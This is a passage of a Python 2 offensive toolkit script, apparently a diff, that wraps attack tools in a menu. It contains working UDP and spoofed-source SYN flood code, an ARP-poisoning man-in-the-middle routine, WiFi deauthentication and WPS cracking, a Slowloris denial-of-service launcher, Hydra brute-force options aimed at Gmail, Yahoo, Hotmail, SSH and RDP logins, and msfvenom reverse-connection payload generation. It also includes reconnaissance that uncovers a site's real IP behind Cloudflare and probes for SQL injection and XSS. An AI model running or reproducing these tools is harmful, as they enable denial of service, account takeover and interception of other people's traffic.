br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") + os.system("ifconfig") + print "\n" + os.system("iwconfig") + print "\n" + os.system("neofetch") + print "\n" + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() + +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" + +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') + +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +def arppois(): + + try: + os.system("iwconfig") + interface = raw_input("[*] Enter Interface: ") + victimIP = raw_input("[*] Enter Victim IP: ") + gateIP = raw_input("[*] Enter Router IP: ") + except KeyboardInterrupt: + print "\n[*] User Requested Shutdown" + print "[*] Exiting..." + os.system("clear") + mainbanner() + + print "\n[*] Enabling IP Forwarding...\n" + os.system("echo 1 > /proc/sys/net/ipv4/ip_forward") + + def get_mac(IP): + conf.verb = 0 + ans, unans = srp(Ether(dst = "ff:ff:ff:ff:ff:ff")/ARP(pdst = IP), timeout = 2, iface = interface, inter = 0.1) + for snd,rcv in ans: + return rcv.sprintf(r"%Ether.src%") + + def reARP(): + + print "\n[*] Restoring Targets..." + victimMAC = get_mac(victimIP) + gateMAC = get_mac(gateIP) + send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = victimMAC), count = 7) + send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = gateMAC), count = 7) + print "[*] Disabling IP Forwarding..." + os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") + print "[*] Shutting Down..." + os.system("clear") + mainbanner() + + def trick(gm, vm): + send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst= vm)) + send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst= gm)) + + def mitm(): + try: + victimMAC = get_mac(victimIP) + except Exception: + os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") + print "[!] Couldn't Find Victim MAC Address" + print "[!] Exiting..." + os.system("clear") + mainbanner() + try: + gateMAC = get_mac(gateIP) + except Exception: + os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") + print "[!] Couldn't Find Gateway MAC Address" + print "[!] Exiting..." + os.system("clear") + mainbanner() + print "[*] Poisoning Targets..." + while 1: + try: + trick(gateMAC, victimMAC) + time.sleep(1.5) + except KeyboardInterrupt: + reARP() + break + mitm() +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + os.system("cat /root/hackers-tool-kit/tools/formats.txt") + s = raw_input("Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) + os.system(a) +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + 